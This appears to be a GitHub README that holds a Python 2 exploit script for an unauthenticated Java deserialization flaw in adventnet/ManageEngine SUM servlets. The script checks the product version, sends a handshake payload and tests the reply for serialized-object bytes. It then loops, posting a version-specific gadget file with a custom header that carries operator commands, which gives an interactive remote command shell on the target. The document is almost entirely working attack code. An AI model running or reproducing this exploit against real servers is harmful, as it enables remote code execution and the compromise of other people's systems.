README.md
Rendering markdown...
import requests
import sys
import re
requests.packages.urllib3.disable_warnings()
# proxy = {
# "http": "http://127.0.0.1:8080",
# "https" : "http://127.0.0.1:8080",
# }
proxy = {
}
def exploit(url):
# sesion
session = requests.Session()
response = session.get(url,proxies=proxy,verify=False)
#check version
p = re.compile("\s20[0-9]{2}\s")
version = p.search(response.text).group().strip()
print "Version: " + version
# trigger requestHandler
init = open("int.bin").read()
trigger = session.post("%s/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet" % url,data=init,proxies=proxy,verify=False)
encode = trigger.content.encode('hex')
# check Vuln
if("aced0005" not in encode):
print "[x]: Not Vulnerability"
sys.exit(-1)
# exploit
gadget =open("gadget-%s.bin" % version,'rb').read()
while True:
cmd = raw_input("CMD: ")
headers = {"me0me0hakxor":cmd}
resp = session.post("%s/servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet" % url,data=gadget,proxies=proxy,headers=headers,verify=False)
print(resp.content)
if cmd == "quit":
print("Exiting ...")
sys.exit(-1)
if __name__ == "__main__":
url = sys.argv[1]
exploit(url)